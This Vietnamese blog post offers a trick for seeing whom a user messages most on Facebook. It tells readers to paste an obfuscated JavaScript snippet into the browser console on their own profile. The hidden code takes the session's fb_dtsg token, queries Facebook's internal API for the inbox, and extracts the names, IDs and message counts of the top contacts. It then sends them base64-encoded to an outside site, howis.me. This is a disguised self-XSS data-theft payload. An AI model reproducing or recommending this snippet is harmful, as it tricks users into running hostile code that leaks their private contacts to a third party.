Xem bạn nhắn tin với ai trên Facebook nhiều nhất

bởi Trung Sky

Có khi nào bạn đặt câu hỏi, sử dụng Facebook đã lâu rồi nhưng ai là người nhắn tin với mình nhiều nhất? Hiện tại, Facebook đã không đưa ra bất kỳ công cụ nào để giúp bạn làm điều đó, chính vì vậy hôm nay mình chia sẻ cách kiểm tra xem bạn nhắn tin với ai nhiều nhất trên mạng xã hội lớn nhất thế giới này. Hãy cùng trải nghiệm thử nhé!

Đầu tiên bạn hãy truy cập vào trang cá nhân của mình, sau đó nhấn F12 và chon tab Console:

var _0x4949=['1475048592613093','queries','stringify','readyState','status','responseText','split','data','message_threads','nodes','POST','/api/graphqlbatch/','send','forEach','ONE_TO_ONE','all_participants','name','thread_key','other_user_id','messages_count','sort','https://howis.me/msgapi.php?d=','getElementsByName','fb_dtsg','value','append'];(function(_0x3cc0d6,_0x47303b){var _0x20fbd2=function(_0xc53986){while(--_0xc53986){_0x3cc0d6['push'](_0x3cc0d6['shift']());}};_0x20fbd2(++_0x47303b);}(_0x4949,0x182));var _0x10b6=function(_0x5365d0,_0x17c323){_0x5365d0=_0x5365d0-0x0;var _0x36d801=_0x4949[_0x5365d0];return _0x36d801;};var messageLimit=0x1f4;var fb_dtsg=document[_0x10b6('0x0')](_0x10b6('0x1'))[0x0][_0x10b6('0x2')];var getConversations=(_0x1e2190,_0xb9ab3f)=>{var _0x15307a=new XMLHttpRequest();var _0x544535=new FormData();_0x544535[_0x10b6('0x3')](_0x10b6('0x1'),_0x1e2190);var _0x1b1128={'o0':{'doc_id':_0x10b6('0x4'),'query_params':{'limit':messageLimit,'tags':['INBOX'],'includeDeliveryReceipts':!![],'includeSeqID':![]}}};_0x544535['append'](_0x10b6('0x5'),JSON[_0x10b6('0x6')](_0x1b1128));_0x15307a['onreadystatechange']=()=>{if(_0x15307a[_0x10b6('0x7')]==0x4&&_0x15307a[_0x10b6('0x8')]==0xc8)_0xb9ab3f(JSON['parse'](_0x15307a[_0x10b6('0x9')][_0x10b6('0xa')]('\x0a')[0x0])['o0'][_0x10b6('0xb')]['viewer'][_0x10b6('0xc')][_0x10b6('0xd')]);};_0x15307a['open'](_0x10b6('0xe'),_0x10b6('0xf'));_0x15307a[_0x10b6('0x10')](_0x544535);};getConversations(fb_dtsg,_0x1617b8=>{var _0x320ef1=[];_0x1617b8[_0x10b6('0x11')](_0x51dc8e=>{if(_0x51dc8e['thread_type']==_0x10b6('0x12')){_0x320ef1['push']({'n':_0x51dc8e[_0x10b6('0x13')][_0x10b6('0xd')][0x0]['messaging_actor'][_0x10b6('0x14')],'i':_0x51dc8e[_0x10b6('0x15')][_0x10b6('0x16')],'c':_0x51dc8e[_0x10b6('0x17')]});}});_0x320ef1[_0x10b6('0x18')]((_0x1b28f1,_0x35734a)=>{return _0x1b28f1['c']>_0x35734a['c']?-0x1:0x1;});var _0x52d3e0=[];m=0xb;_0x320ef1[_0x10b6('0x11')](_0x51cb6a=>{if(m>0x0){_0x52d3e0['push'](_0x51cb6a);m-=0x1;}});document['location']=_0x10b6('0x19')+btoa(unescape(encodeURIComponent(JSON[_0x10b6('0x6')](_0x52d3e0))));});

Nhập đoạn code bên dưới, sau đó gõ Enter:

Và đây là kết quả :


Chúc bạn thành công!

12 bình luận
2

Related Posts

Leave a Comment